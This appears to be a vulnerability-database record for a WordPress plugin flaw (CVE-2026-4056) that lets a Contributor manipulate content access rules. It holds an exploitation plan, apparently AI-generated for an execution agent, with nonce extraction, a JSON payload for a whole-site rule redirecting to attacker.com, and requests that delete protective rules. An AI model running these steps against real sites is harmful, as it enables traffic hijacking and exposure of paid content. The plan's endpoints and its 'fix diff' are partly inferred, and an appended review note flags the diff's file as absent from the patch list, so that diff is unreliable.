[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fFYCKwlzCtyyTeAxkLuyAqCJq9JMknDQtYjrrGniBCR4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-4056","user-registration-membership-missing-authorization-to-authenticated-contributor-content-access-rule-manipulation","User Registration & Membership \u003C= 5.1.4 - Missing Authorization to Authenticated (Contributor+) Content Access Rule Manipulation","The User Registration & Membership plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the Content Access Rules REST API endpoints in versions 5.0.1 through 5.1.4. This is due to the `check_permissions()` method only checking for `edit_posts` capability instead of an administrator-level capability. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to list, create, modify, toggle, duplicate, and delete site-wide content restriction rules, potentially exposing restricted content or denying legitimate user access.","user-registration",null,"\u003C=5.1.4","5.1.5","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Missing Authorization","2026-03-23 11:24:15","2026-03-23 23:25:50",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7bb5a5a2-9644-4850-a5f9-7c925af000c8?source=api-prod",1,[22,23,24,25,26,27,28,29],"CHANGELOG.txt","assets\u002Fcss\u002Fadmin-rtl.css","assets\u002Fcss\u002Fadmin.css","assets\u002Fcss\u002Fadmin.scss","assets\u002Fcss\u002Fcomponents\u002F_toggle.scss","assets\u002Fcss\u002Fmodules\u002Fmembership\u002Fuser-registration-membership-admin.css","assets\u002Fcss\u002Fmodules\u002Fmembership\u002Fuser-registration-membership-admin.scss","assets\u002Fcss\u002Fmodules\u002Fmembership\u002Fuser-registration-membership-frontend.css","researched",false,3,"# Exploitation Research Plan: CVE-2026-4056\n\n## 1. Vulnerability Summary\nThe **User Registration & Membership** plugin (versions 5.0.1 through 5.1.4) contains a missing authorization vulnerability within its REST API implementation for Content Access Rules. The vulnerability stems from the `check_permissions()` method (likely within a REST Controller class such as `UR_REST_Content_Rules_Controller` - *inferred*) erroneously checking for the `edit_posts` capability. \n\nIn WordPress, the `edit_posts` capability is granted to roles as low as **Contributor**. Consequently, any authenticated user with Contributor-level access or higher can bypass intended administrative restrictions to view, create, modify, or delete site-wide content restriction rules. 
This allows attackers to expose protected content or disrupt site availability by locking out legitimate users.\n\n## 2. Attack Vector Analysis\n*   **Endpoints:** \n    *   `GET \u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules` (List rules)\n    *   `POST \u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules` (Create rule)\n    *   `PUT\u002FPATCH \u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules\u002F\u003Cid>` (Modify rule)\n    *   `DELETE \u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules\u002F\u003Cid>` (Delete rule)\n    *   `POST \u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules\u002F\u003Cid>\u002Ftoggle` (Toggle rule - *inferred*)\n    *   `POST \u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules\u002F\u003Cid>\u002Fduplicate` (Duplicate rule - *inferred*)\n*   **Authentication:** Authenticated, Contributor role (`edit_posts` capability).\n*   **Authorization Header:** `X-WP-Nonce` (WordPress REST API Nonce).\n*   **Payload Format:** JSON.\n\n## 3. Code Flow\n1.  **Request Entry:** An authenticated Contributor sends a request to the REST API namespace `user-registration\u002Fv1` under the `content-rules` route.\n2.  **Route Dispatch:** The WordPress REST server matches the request and calls the `permission_callback` registered for the route.\n3.  **Vulnerable Check:** The `permission_callback` (pointing to `check_permissions()`) executes:\n    ```php\n    public function check_permissions( $request ) {\n        return current_user_can( 'edit_posts' ); \u002F\u002F VULNERABLE: Should be 'manage_options'\n    }\n    ```\n4.  **Action Execution:** Since a Contributor returns `true` for `current_user_can( 'edit_posts' )`, the request proceeds to the controller methods (e.g., `get_items`, `create_item`, `update_item`) allowing the attacker to manipulate the `ur_content_restriction_rules` (or similar - *inferred*) data in the database.\n\n## 4. 
Nonce Acquisition Strategy\nTo interact with the REST API via the browser's session (Cookie authentication), the attacker needs the `wp_rest` nonce.\n\n1.  **Precondition:** The attacker is logged in as a Contributor.\n2.  **Navigation:** Access the WordPress dashboard (`\u002Fwp-admin\u002F`).\n3.  **Extraction:** The `wp_rest` nonce is automatically localized by WordPress in the `wpApiSettings` object.\n4.  **Execution Agent Command:**\n    ```javascript\n    \u002F\u002F Use browser_eval to get the nonce\n    const nonce = window.wpApiSettings?.nonce;\n    return nonce;\n    ```\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate unauthorized modification of content restriction rules.\n\n### Step 1: List Existing Rules\nIdentify existing rules to find a target for modification or deletion.\n*   **Tool:** `http_request`\n*   **Method:** `GET`\n*   **URL:** `https:\u002F\u002F\u003Ctarget>\u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules`\n*   **Headers:**\n    *   `X-WP-Nonce: \u003Cextracted_nonce>`\n\n### Step 2: Create a Malicious Rule (Denial of Service)\nCreate a rule that restricts access to the entire site or a specific critical page to a non-existent membership.\n*   **Tool:** `http_request`\n*   **Method:** `POST`\n*   **URL:** `https:\u002F\u002F\u003Ctarget>\u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules`\n*   **Headers:**\n    *   `X-WP-Nonce: \u003Cextracted_nonce>`\n    *   `Content-Type: application\u002Fjson`\n*   **Payload (Inferred structure based on plugin features):**\n    ```json\n    {\n        \"title\": \"Exploit Rule\",\n        \"status\": \"enabled\",\n        \"restriction_type\": \"whole_site\",\n        \"membership_ids\": [9999],\n        \"restriction_action\": \"redirect\",\n        \"redirect_url\": \"https:\u002F\u002Fattacker.com\"\n    }\n    ```\n\n### Step 3: Delete Existing Rules\nRemove rules that protect premium content.\n*   **Tool:** `http_request`\n*   **Method:** `DELETE`\n*   
**URL:** `https:\u002F\u002F\u003Ctarget>\u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules\u002F\u003Cid_from_step_1>`\n*   **Headers:**\n    *   `X-WP-Nonce: \u003Cextracted_nonce>`\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Install \"User Registration & Membership\" version 5.1.4.\n2.  **Create User:** Create a user with the **Contributor** role.\n3.  **Create Sample Membership:** As admin, create one membership plan (e.g., \"Gold\").\n4.  **Create Sample Rule:** As admin, create a content restriction rule that restricts a specific page (e.g., \"Premium Page\") to \"Gold\" members only.\n\n## 7. Expected Results\n*   **List Request:** Returns a `200 OK` with a JSON array of rules, even though the user is not an administrator.\n*   **Create Request:** Returns a `201 Created` or `200 OK`, and a new rule appears in the database\u002Fadmin UI.\n*   **Delete Request:** Returns a `200 OK`, and the targeted restriction rule is removed from the site.\n\n## 8. Verification Steps\n1.  **Verify via WP-CLI:**\n    ```bash\n    # Check if the \"Exploit Rule\" exists in the options or custom table\n    wp option get ur_content_restriction_rules --format=json\n    # OR if stored as a custom post type (check common slugs)\n    wp post list --post_type=ur_content_rule\n    ```\n2.  **Verify via UI:** Log in as admin and navigate to the Content Access Rules section of the User Registration plugin to see the modified\u002Fadded rules.\n3.  **Verify Impact:** Attempt to access the site or a restricted page as an unauthenticated user to see if the new restriction (e.g., redirect to attacker.com) is active.\n\n## 9. Alternative Approaches\nIf the `content-rules` endpoint name differs from the inference:\n1.  **Discovery:** Use `GET \u002Fwp-json\u002F` to list all available routes and grep for `user-registration`.\n2.  
**Parameter Fuzzing:** If the `POST` payload is rejected, use `GET \u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules\u002F\u003Cid>` to see the exact JSON schema of an existing rule and mirror its structure in the exploit payload.\n3.  **Auth Bypass Check:** Verify if `wp_ajax_nopriv_` handles these rules (unlikely given the \"Authenticated\" description, but worth a check if the REST API is hardened).","The User Registration & Membership plugin contains a missing authorization vulnerability in its Content Access Rules REST API endpoints. Authenticated attackers with Contributor-level access (possessing the 'edit_posts' capability) can list, create, modify, and delete site-wide content restriction rules, allowing them to expose restricted content or perform a denial of service by locking out users.","\u002F\u002F File: includes\u002Frest-api\u002Fclass-ur-rest-content-rules-controller.php (inferred path)\n\npublic function check_permissions( $request ) {\n    return current_user_can( 'edit_posts' );\n}","--- includes\u002Frest-api\u002Fclass-ur-rest-content-rules-controller.php\n+++ includes\u002Frest-api\u002Fclass-ur-rest-content-rules-controller.php\n@@ -20,1 +20,1 @@\n-    return current_user_can( 'edit_posts' );\n+    return current_user_can( 'manage_options' );","The exploit targets the plugin's REST API endpoints located at `\u002Fwp-json\u002Fuser-registration\u002Fv1\u002Fcontent-rules`. An attacker must first log in as a user with at least Contributor-level privileges to obtain a valid session and a `wp_rest` nonce from the WordPress dashboard (`wpApiSettings.nonce`). \n\nBecause the `check_permissions` method incorrectly validates for the `edit_posts` capability—which Contributors possess—the attacker can send authorized requests to create a new rule (POST), list all existing rules (GET), or delete rules (DELETE). 
For example, a POST request with a JSON payload defining a 'whole_site' restriction redirecting to an external URL can effectively hijack the entire site's traffic.","gemini-3-flash-preview","2026-04-17 23:08:35","2026-04-17 23:08:56",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","5.1.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuser-registration\u002Ftags\u002F5.1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fuser-registration.5.1.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuser-registration\u002Ftags\u002F5.1.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fuser-registration.5.1.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuser-registration\u002Ftags"]
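Review bot: the `+` line under `@@ -20,1 +20,1 @@` swaps `edit_posts` for `manage_options`, but the record itself labels this file path as inferred, and `includes/rest-api/class-ur-rest-content-rules-controller.php` is not among the listed `patch_diff_files` (only `CHANGELOG.txt` and CSS/SCSS assets are). Confirm the hunk against the 5.1.5 tag before treating it as the shipped fix. While confirming, check that every content-rules route, including the toggle and duplicate routes the record marks as inferred, registers this same `check_permissions()` as its `permission_callback`, because a one-line change here only protects routes wired to it.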